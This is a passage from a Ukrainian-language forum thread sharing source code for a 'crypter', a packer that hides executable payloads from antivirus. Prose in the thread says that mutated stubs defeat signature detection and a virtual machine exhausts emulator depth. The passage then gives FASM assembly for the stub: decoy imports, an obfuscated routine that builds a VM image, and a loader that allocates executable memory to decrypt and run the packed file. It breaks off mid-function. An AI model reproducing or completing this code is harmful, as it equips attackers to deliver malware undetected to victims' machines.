  movzx ecx, Byte [ebx+edx]
  mov  Byte [esi], cl
  inc  esi
  xor  edx, edx
  div  edi
  movzx ecx, Byte [ebx+edx]
  mov  Byte [esi], cl
  popa
  xor  eax, eax
  ret
endp

proc ascii85_encode pSrc:DWORD, pDst:DWORD, dwLen:DWORD
  pusha
  mov   esi, [pSrc]
  mov   edi, [pDst]
  mov   ecx, [dwLen]
  add   ecx, 03h
  shr   ecx, 02h
.up:
  stdcall ascii85_encode_dword, edi, DWord [esi]
  add   esi, 04h
  add   edi, 05h
  loop  .up
  popa
  ret
endp
Post's attachments

packer.srcnbin.zip 257.45 kb, 870 downloads since 2015-01-02 

2

Re: [Джерельний код] Криптор

Анатомія стабів

Стаби біж собою сильно різняться, навіть якщо вони мають спільні віртуальні машини, паролі і абетки для розшифрування початкового файлу. Мутації коду нескладні, але їх цілком достатньо для того, щоб збити з пантелику сигнатурний детектор. За вичерпання глибини емуляції відповідає програмна віртуальна машина.

Лістинг головного файлу стаба - stub.asm. Звичайно, що в процесі криптування задіяний не сам лістинг :), а об’єктний файл stub.obj, якого ми одержуємо з цього лістингу, передавший той до FASM’у.

Одчинити
format MS COFF
use32
include '%FASMINC%\win32a.inc'
include 'picovm.inc'

macro @ cmd, p {
 PICOVM_CMD cmd, p
}

extrn crdata
extrn '__imp__GetStdHandle@4' as GetStdHandle:DWord
extrn '__imp__VirtualAlloc@16' as VirtualAlloc:DWord
extrn '__imp__WriteFile@20' as WriteFile:DWord
extrn '__imp__GetDC@4' as GetDC:DWord
extrn '__imp__BeginPaint@8' as BeginPaint:DWord
extrn '__imp__CreateMutexA@12' as CreateMutexA:DWord
extrn '__imp__CreateMutexW@12' as CreateMutexW:DWord
extrn '__imp__VirtualFree@12' as VirtualFree:DWord
extrn '__imp__GetLastError@0' as GetLastError:DWord
extrn '__imp__GetModuleHandleA@4' as GetModuleHandleA:DWord
extrn '__imp__GetModuleHandleW@4' as GetModuleHandleW:DWord
extrn '__imp__GetSystemInfo@4' as GetSystemInfo:DWord
extrn '__imp__GetVersionExA@4' as GetVersionExA:DWord
extrn '__imp__LocalAlloc@8' as LocalAlloc:DWord
extrn '__imp__CharUpperA@4' as CharUpperA:DWord
extrn '__imp__CreateDialogParamA@20' as CreateDialogParamA:DWord
extrn '__imp__CreateWindowExA@48' as CreateWindowExA:DWord
extrn '__imp__DefWindowProcA@16' as DefWindowProcA:DWord
extrn '__imp__DispatchMessageA@4' as DispatchMessageA:DWord
extrn '__imp__EndDialog@8' as EndDialog:DWord
extrn '__imp__EndPaint@8' as EndPaint:DWord
extrn '__imp__GetClassInfoExA@12' as GetClassInfoExA:DWord
extrn '__imp__GetMessageA@16' as GetMessageA:DWord
extrn '__imp__GetSystemMetrics@4' as GetSystemMetrics:DWord
extrn '__imp__LoadCursorA@8' as LoadCursorA:DWord
extrn '__imp__LoadIconA@8' as LoadIconA:DWord
extrn '__imp__PostQuitMessage@4' as PostQuitMessage:DWord
extrn '__imp__RegisterClassExA@4' as RegisterClassExA:DWord
extrn '__imp__SendMessageA@16' as SendMessageA:DWord
extrn '__imp__SendMessageW@16' as SendMessageW:DWord
extrn '__imp__SetDlgItemInt@16' as SetDlgItemInt:DWord
extrn '__imp__SetFocus@4' as SetFocus:DWord
extrn '__imp__SetWindowTextW@8' as SetWindowTextW:DWord
extrn '__imp__ShowWindow@8' as ShowWindow:DWord
extrn '__imp__TranslateMessage@4' as TranslateMessage:DWord
extrn '__imp__UpdateWindow@4' as UpdateWindow:DWord
extrn '__imp__GetDIBits@28' as GetDIBits:DWord
extrn '__imp__CreateCompatibleBitmap@12' as CreateCompatibleBitmap:DWord
extrn '__imp__GdiFlush@0' as GdiFlush:DWord
extrn '__imp__CombineRgn@16' as CombineRgn:DWord
extrn '__imp__CreateRectRgnIndirect@4' as CreateRectRgnIndirect:DWord
extrn '__imp__GetRegionData@12' as GetRegionData:DWord
extrn '__imp__SetStretchBltMode@8' as SetStretchBltMode:DWord
extrn '__imp__SelectObject@8' as SelectObject:DWord
extrn '__imp__CreateCompatibleDC@4' as CreateCompatibleDC:DWord
extrn '__imp__CreateDIBitmap@24' as CreateDIBitmap:DWord
extrn '__imp__BitBlt@36' as BitBlt:DWord
extrn '__imp__SetBkMode@8' as SetBkMode:DWord
extrn '__imp__CreateFontIndirectA@4' as CreateFontIndirectA:DWord
extrn '__imp__DPtoLP@12' as DPtoLP:DWord
extrn '__imp__GetDeviceCaps@8' as GetDeviceCaps:DWord
extrn '__imp__CreateFontA@56' as CreateFontA:DWord
extrn '__imp__StretchBlt@44' as StretchBlt:DWord
extrn '__imp__GetObjectA@12' as GetObjectA:DWord
extrn '__imp__SelectClipRgn@8' as SelectClipRgn:DWord
extrn '__imp__ExtTextOutA@32' as ExtTextOutA:DWord
struct PICOVM_DATA
context PICOVM_CONTEXT ?
picovm db 0x3E7 dup (?)
dstack dd 0x2D dup (?)
rstack dd 0x18 dup (?)
ends

section '.data' data readable writeable

pcode:
file 'pcode.bin'

section '.text' code readable executable

proc genvmimage, pPicoVMImage
  mov   ebx, [pPicoVMImage]
  mov   DWord [ebx], DWORD 0xE860
  lea   ebx, [ebx+0x4]
  mov   ecx, DWORD 0x2C830000
  mov   DWord [ebx], ecx
  lea   ebx, [ebx+0x4]
  push  DWORD 0x835D0624
  pop   eax
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   edx, DWORD 0x177706F8
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  mov   edx, DWORD 0x7E8
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x6900D24F
  xor   eax, 0xFA76344F
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  push  DWORD 0xC82EAE56
  pop   DWord [ebx]
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xCB60F59
  add   ebx, DWORD 0x4
  mov   edi, DWORD 0xFFE90101
  push  edi
  pop   DWord [ebx]
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xBA4DEBD1
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xFFFFFFFA
  lea   ebx, [ebx+0x4]
  push  DWORD 0x896015EB
  pop   esi
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  mov   edx, DWORD 0xFF6D1729
  not   edx
  mov   DWord [ebx], edx
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x5F7D1476
  xor   DWord [ebx], 0xE9721476
  lea   ebx, [ebx+0x4]
  mov   eax, DWORD 0xEC04AD5C
  xor   eax, 0x263DA417
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xFCBA0A72
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xF9FFFFFF
  add   ebx, DWORD 0x4
  push  DWORD 0x2CEBD089
  pop   eax
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  push  DWORD 0x890E4B8B
  pop   DWord [ebx]
  add   ebx, DWORD 0x4
  push  DWORD 0xE438331
  pop   eax
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xF8D23104
  add   ebx, DWORD 0x4
  push  DWORD 0xE860EEEB
  pop   edi
  mov   DWord [ebx], edi
  add   ebx, DWORD 0x4
  mov   ecx, DWORD 0xDAB65B27
  xor   ecx, 0xDAB65B4B
  mov   DWord [ebx], ecx
  lea   ebx, [ebx+0x4]
  mov   esi, DWORD 0x775D285
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  mov   ecx, DWORD 0xFFFFFBBA
  push  ecx
  pop   DWord [ebx]
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xFBE37DD3
  xor   DWord [ebx], 0x703F962C
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x32970366
  xor   DWord [ebx], 0x731C0D2D
  lea   ebx, [ebx+0x4]
  push  DWORD 0xE6B83FC
  pop   DWord [ebx]
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x2F59C8F
  xor   DWord [ebx], 0xFA27AD8B
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0xD23166EB
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   esi, DWORD 0xE840C031
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x7A6EF2C5
  xor   DWord [ebx], 0x7A6EF21F
  add   ebx, DWORD 0x4
  mov   esi, DWORD 0xB474F38D
  mov   DWord [ebx], esi
  not   DWord [ebx]
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xFC418B12
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x4126B83
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x3192C3F8
  lea   ebx, [ebx+0x4]
  mov   esi, DWORD 0x8A2C9C15
  xor   esi, 0xFEF65D5
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  mov   esi, DWORD 0x890374D2
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x93231882
  xor   DWord [ebx], 0xC0A819D1
  lea   ebx, [ebx+0x4]
  mov   ecx, DWORD 0xFF3A8001
  mov   DWord [ebx], ecx
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x3FE80874
  add   ebx, DWORD 0x4
  push  DWORD 0x73000000
  pop   DWord [ebx]
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x3192C3F1
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0xC031C3C0
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  mov   ecx, DWORD 0xA3E8C4FE
  mov   DWord [ebx], ecx
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x73000000
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x66E2EE9
  xor   DWord [ebx], 0xC5BEA7EA
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x9CC9BE58
  xor   DWord [ebx], 0x15DBF5D3
  lea   ebx, [ebx+0x4]
  mov   esi, DWORD 0x1D5045E
  xor   esi, 0x1396874F
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  push  DWORD 0xF76E4294
  pop   eax
  xor   eax, 0x34BC7390
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x12438B60
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x70B9860A
  xor   DWord [ebx], 0x5BB7D581
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xE8C10543
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xA532B02
  add   ebx, DWORD 0x4
  mov   ecx, DWORD 0xF802EAC1
  mov   DWord [ebx], ecx
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x3BBAD5A6
  xor   DWord [ebx], 0x2F9E812F
  add   ebx, DWORD 0x4
  mov   edx, DWORD 0x2EFBD1E2
  xor   edx, 0x32DF956B
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x3160C361
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x738B50C0
  lea   ebx, [ebx+0x4]
  push  DWORD 0x4E1F4217
  pop   DWord [ebx]
  xor   DWord [ebx], 0xAFA2CF16
  add   ebx, DWORD 0x4
  mov   esi, DWORD 0xBF18BBAE
  xor   esi, 0xB018BBAC
  mov   DWord [ebx], esi
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xF4E63A80
  xor   DWord [ebx], 0x3C6F3436
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xC701E0D1
  lea   ebx, [ebx+0x4]
  mov   esi, DWORD 0xB36AC19C
  xor   esi, 0xB4DCCECB
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  mov   ecx, DWORD 0xE0C13F24
  mov   DWord [ebx], ecx
  lea   ebx, [ebx+0x4]
  mov   edi, DWORD 0x93A9BEFC
  xor   edi, 0x95417EFF
  push  edi
  pop   DWord [ebx]
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xF63FC8A1
  xor   DWord [ebx], 0xF63F8549
  lea   ebx, [ebx+0x4]
  mov   eax, DWORD 0x879DFDB
  xor   eax, 0x744ADDB
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x918EF578
  xor   DWord [ebx], 0x794FF2CF
  add   ebx, DWORD 0x4
  mov   ecx, DWORD 0x5E80106
  mov   DWord [ebx], ecx
  lea   ebx, [ebx+0x4]
  mov   esi, DWORD 0xB4B65D0
  xor   esi, 0xB4B645A
  mov   DWord [ebx], esi
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x24048155
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   ecx, DWORD 0xFFFFFED0
  not   ecx
  mov   DWord [ebx], ecx
  lea   ebx, [ebx+0x4]
  mov   edx, DWORD 0x127B8B50
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x7407A874
  not   eax
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x8822FDB9
  xor   DWord [ebx], 0xD2E101FE
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x8524048B
  lea   ebx, [ebx+0x4]
  mov   edx, DWORD 0x8B1575C0
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  mov   esi, DWORD 0xF14245C
  mov   DWord [ebx], esi
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xE28312B6
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xDDFFD3C2
  xor   DWord [ebx], 0x56F3A7C5
  lea   ebx, [ebx+0x4]
  mov   edx, DWORD 0xD6010173
  mov   DWord [ebx], edx
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x3EBD231
  add   ebx, DWORD 0x4
  mov   esi, DWORD 0x89F99692
  mov   DWord [ebx], esi
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x7B8959F0
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   esi, DWORD 0x1738912
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x316082EB
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xEE25AFD3
  xor   DWord [ebx], 0x2FE7262C
  add   ebx, DWORD 0x4
  mov   ecx, DWORD 0x819608EA
  mov   DWord [ebx], ecx
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xFFE6
  add   ebx, DWORD 0x4
  mov   edx, DWORD 0xFF5AE800
  mov   DWord [ebx], edx
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x50B949D1
  xor   DWord [ebx], 0xA080B62E
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xEB4F037D
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x33B60F0B
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xD639C629
  lea   ebx, [ebx+0x4]
  mov   esi, DWORD 0x4F4F057D
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  mov   ecx, DWORD 0xF801EBF9
  mov   DWord [ebx], ecx
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0xFF56E997
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xD0FFFFFF
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x831089C3
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   edx, DWORD 0x66C308EF
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xF7EB1089
  lea   ebx, [ebx+0x4]
  push  DWORD 0xF3EB1088
  pop   DWord [ebx]
  lea   ebx, [ebx+0x4]
  mov   eax, DWORD 0x4C5EFB9D
  xor   eax, 0x67B53D14
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   esi, DWORD 0x27EBC601
  mov   DWord [ebx], esi
  add   ebx, DWORD 0x4
  mov   edx, DWORD 0xFB8A2D7A
  not   edx
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xE3EBC601
  add   ebx, DWORD 0x4
  mov   edx, DWORD 0x87E0EB46
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  mov   ecx, DWORD 0x830F89CA
  mov   DWord [ebx], ecx
  lea   ebx, [ebx+0x4]
  mov   ecx, DWORD 0xFC304C7
  mov   DWord [ebx], ecx
  add   ebx, DWORD 0x4
  push  DWORD 0x14FEB149
  pop   ecx
  mov   DWord [ebx], ecx
  not   DWord [ebx]
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x4EB70FF4
  lea   ebx, [ebx+0x4]
  mov   esi, DWORD 0x8BEEEB01
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xE9EB014E
  lea   ebx, [ebx+0x4]
  mov   edi, DWORD 0x147399B2
  xor   edi, 0x97957223
  mov   DWord [ebx], edi
  lea   ebx, [ebx+0x4]
  push  DWORD 0x89C304EF
  pop   edx
  mov   DWord [ebx], edx
  lea   ebx, [ebx+0x4]
  mov   esi, DWORD 0x42F289C1
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xFFFE55E8
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x214D0817
  xor   DWord [ebx], 0xDDCF07E8
  add   ebx, DWORD 0x4
  mov   esi, DWORD 0x76FFFFFF
  not   esi
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  mov   edx, DWORD 0x2B3A10DA
  xor   edx, 0xA2D2FB14
  mov   DWord [ebx], edx
  lea   ebx, [ebx+0x4]
  mov   esi, DWORD 0x2E11D17F
  xor   esi, 0x6CE358BE
  push  esi
  pop   DWord [ebx]
  lea   ebx, [ebx+0x4]
  mov   edx, DWORD 0xFFFE41E8
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  push  DWORD 0xE8820FFF
  pop   DWord [ebx]
  lea   ebx, [ebx+0x4]
  mov   edi, DWORD 0x1000000
  mov   DWord [ebx], edi
  add   ebx, DWORD 0x4
  mov   ecx, DWORD 0x6EDCA62F
  xor   ecx, 0xE7084DE1
  mov   DWord [ebx], ecx
  add   ebx, DWORD 0x4
  mov   edx, DWORD 0xD23192C1
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0xA8760E08
  not   eax
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x2539B0ED
  xor   DWord [ebx], 0x14F15B15
  lea   ebx, [ebx+0x4]
  mov   ecx, DWORD 0x77D039C9
  mov   DWord [ebx], ecx
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xA848CCD2
  xor   DWord [ebx], 0xE7C185D3
  lea   ebx, [ebx+0x4]
  mov   edi, DWORD 0xCE431407
  mov   DWord [ebx], edi
  not   DWord [ebx]
  lea   ebx, [ebx+0x4]
  mov   edx, DWORD 0x72D039C9
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xF2EB49F5
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x979D016D
  xor   eax, 0xD576D16C
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x3A6554E9
  xor   DWord [ebx], 0xE48E96C0
  add   ebx, DWORD 0x4
  mov   esi, DWORD 0x6B1A88CD
  xor   esi, 0x51F16A3A
  mov   DWord [ebx], esi
  add   ebx, DWORD 0x4
  mov   ecx, DWORD 0x36EBD031
  mov   DWord [ebx], ecx
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xD3CA8792
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xF5DAECA1
  xor   DWord [ebx], 0x67F50749
  add   ebx, DWORD 0x4
  mov   edx, DWORD 0xC8D3CA87
  mov   DWord [ebx], edx
  lea   ebx, [ebx+0x4]
  mov   ecx, DWORD 0xAE924035
  xor   ecx, 0x290068DE
  mov   DWord [ebx], ecx
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xEBE0D3CA
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x39C93121
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x93CE6FB7
  xor   DWord [ebx], 0xDA091A67
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x2F650317
  xor   eax, 0xFF92C7FC
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x4F8B2FEB
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xF45789F4
  add   ebx, DWORD 0x4
  mov   edx, DWORD 0x4391101E
  xor   edx, 0xCA695797
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x89C3FC4F
  add   ebx, DWORD 0x4
  push  DWORD 0xD23192C1
  pop   DWord [ebx]
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x4789F1F7
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  push  DWORD 0xFF65E9F8
  pop   DWord [ebx]
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x8792FFFF
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xBF07A6FB
  xor   DWord [ebx], 0x54C77531
  lea   ebx, [ebx+0x4]
  mov   edi, DWORD 0xEBD021F1
  mov   DWord [ebx], edi
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xEBD009ED
  lea   ebx, [ebx+0x4]
  mov   edi, DWORD 0x578992E9
  mov   DWord [ebx], edi
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x637EDD17
  xor   eax, 0x6D954CEF
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xEB00B60F
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xB70FF8
  lea   ebx, [ebx+0x4]
  push  DWORD 0x61C6CA88
  pop   eax
  xor   eax, 0x614D3963
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x575D131E
  xor   DWord [ebx], 0x18D4FCF5
  add   ebx, DWORD 0x4
  mov   esi, DWORD 0x4040C3FC
  mov   DWord [ebx], esi
  add   ebx, DWORD 0x4
  mov   esi, DWORD 0xA8A740E9
  xor   esi, 0x6B4F8260
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  mov   eax, DWORD 0x72FFFFFE
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x2E2C143
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x356D85CB
  xor   DWord [ebx], 0xE5447D42
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x83370722
  xor   DWord [ebx], 0xC4B837DD
  lea   ebx, [ebx+0x4]
  push  DWORD 0x3EB52BF8
  pop   ecx
  xor   ecx, 0xFC3CE804
  mov   DWord [ebx], ecx
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xABE84040
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x72FFFFFE
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  mov   edx, DWORD 0xD189602B
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  push  DWORD 0x8B4B3949
  pop   DWord [ebx]
  xor   DWord [ebx], 0x40C2CECE
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x2E3C143
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  mov   edx, DWORD 0x817221D6
  mov   DWord [ebx], edx
  not   DWord [ebx]
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xFC37FFFC
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x78FA5F3
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x4EF8361
  lea   ebx, [ebx+0x4]
  mov   eax, DWORD 0x4EF83C3
  mov   DWord [ebx], eax
  lea   ebx, [ebx+0x4]
  push  DWORD 0x1D241BC5
  pop   DWord [ebx]
  xor   DWord [ebx], 0xE0A4F306
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x372FFFF
  lea   ebx, [ebx+0x4]
  mov   eax, DWORD 0x44EBA2E1
  xor   eax, 0xD6286468
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  push  DWORD 0xB89C6578
  pop   DWord [ebx]
  xor   DWord [ebx], 0xB0B821F1
  add   ebx, DWORD 0x4
  mov   edx, DWORD 0x112391C3
  mov   DWord [ebx], edx
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0xA77C975B
  xor   DWord [ebx], 0xF6539E1A
  add   ebx, DWORD 0x4
  mov   edx, DWORD 0xD10CE302
  mov   DWord [ebx], edx
  add   ebx, DWORD 0x4
  push  DWORD 0x56F6AEC7
  pop   edx
  not   edx
  mov   DWord [ebx], edx
  lea   ebx, [ebx+0x4]
  mov   edi, DWORD 0x910B620F
  mov   DWord [ebx], edi
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x8471126
  add   ebx, DWORD 0x4
  mov   edi, DWORD 0x1EA6D631
  xor   edi, 0x56A8B331
  mov   DWord [ebx], edi
  lea   ebx, [ebx+0x4]
  mov   ecx, DWORD 0x6C16614A
  xor   ecx, 0xFD13E95B
  mov   DWord [ebx], ecx
  lea   ebx, [ebx+0x4]
  mov   edx, DWORD 0x11215127
  mov   DWord [ebx], edx
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x4A4199E4
  xor   DWord [ebx], 0xDB7E90CF
  lea   ebx, [ebx+0x4]
  mov   eax, DWORD 0x3FCFE6DB
  mov   DWord [ebx], eax
  not   DWord [ebx]
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x4900D151
  add   ebx, DWORD 0x4
  push  DWORD 0x5139D110
  pop   edi
  mov   DWord [ebx], edi
  add   ebx, DWORD 0x4
  mov   eax, DWORD 0x112CD129
  mov   DWord [ebx], eax
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0xD11E5137
  add   ebx, DWORD 0x4
  mov   esi, DWORD 0x6BDEBAE8
  xor   esi, 0xA2C8F2D2
  mov   DWord [ebx], esi
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x911B513D
  lea   ebx, [ebx+0x4]
  mov   DWord [ebx], DWORD 0x962BAC91
  xor   DWord [ebx], 0xC72D3C92
  add   ebx, DWORD 0x4
  mov   DWord [ebx], DWORD 0x89259133
  lea   ebx, [ebx+0x4]
  mov   BYTE [ebx], 0x3C
  sub   ebx, -1
  mov   BYTE [ebx], 0x88
  add   ebx, 1
  mov   BYTE [ebx], 0x4
  ret
endp

public CryptMain as '_CryptMain@0'

proc  CryptMain 
 local  pUnpackedData:DWORD
 local  ppcode:DWORD
 local  palphabet:DWORD
 local  pefilesize:DWORD
 local  inpfsz:DWORD
 local  ppicovm:DWORD
 local  ppass:DWORD
 local  pvmctx:DWORD
 local  pmem:DWORD
 local  cdcrsize:DWORD
 local  pPackedData:DWORD
 local  pS:DWORD
 local  S[0x100]:BYTE
 local  iResult:DWORD
  push  esi
  push  edx
  push  ecx
  push  ebx
  push  eax
  mov   ebx, DWord [pmem]
  lea   ebx, [ebx+PICOVM_DATA.context]
  mov   DWord [pvmctx], ebx
  stdcall DWord [VirtualAlloc], NULL, 0xACADBE71, MEM_TOP_DOWN or MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE
  push  eax
  pop   DWord [pmem]
  lea   eax, [alphbody]
  mov   eax, DWord [pmem]
  add   eax, DWORD 0x1751
  mov   DWord [pUnpackedData], eax
  lea   ebx, [passbody]
  push  ebx
  pop   DWord [ppass]
  lea   eax, [crdata]
  mov   DWord [pPackedData], eax
  mov   eax, DWord [pmem]
  lea   esi, [eax+PICOVM_DATA.rstack]
  lea   edx, [eax+PICOVM_DATA.dstack]
  mov   DWord [eax+PICOVM_DATA.context._dstack_begin], edx
  mov   BYTE [eax+PICOVM_DATA.context._dstack_size], 0x18
  mov   DWord [eax+PICOVM_DATA.context._rstack_top], esi
  mov   DWord [eax+PICOVM_DATA.context._rstack_begin], esi
  push  edx
  pop   DWord [eax+PICOVM_DATA.context._dstack_top]
  mov   BYTE [eax+PICOVM_DATA.context._rstack_size], 0x2D
  lea   eax, [s]
  push  eax
  pop   DWord [pS]
  lea   ecx, [alphbody]
  push  ecx
  pop   DWord [palphabet]
  mov   DWord [cdcrsize], DWORD 0xAB7E6CA9
  mov   esi, DWord [pmem]
  lea   esi, [PICOVM_DATA.picovm+esi]
  push  esi
  pop   DWord [ppicovm]
  push  esi
  pop   DWord [ppicovm]
  stdcall genvmimage, esi
  lea   ebx, [pcode]
  push  ebx
  pop   DWord [ppcode]
  mov   eax, PICOVM_FNC_DSPUSH
  mov   edx, DWord [pS]
  push  DWord [pvmctx]
  pop   ebx
  call  [ppicovm]
  mov   edx, DWord [ppass]
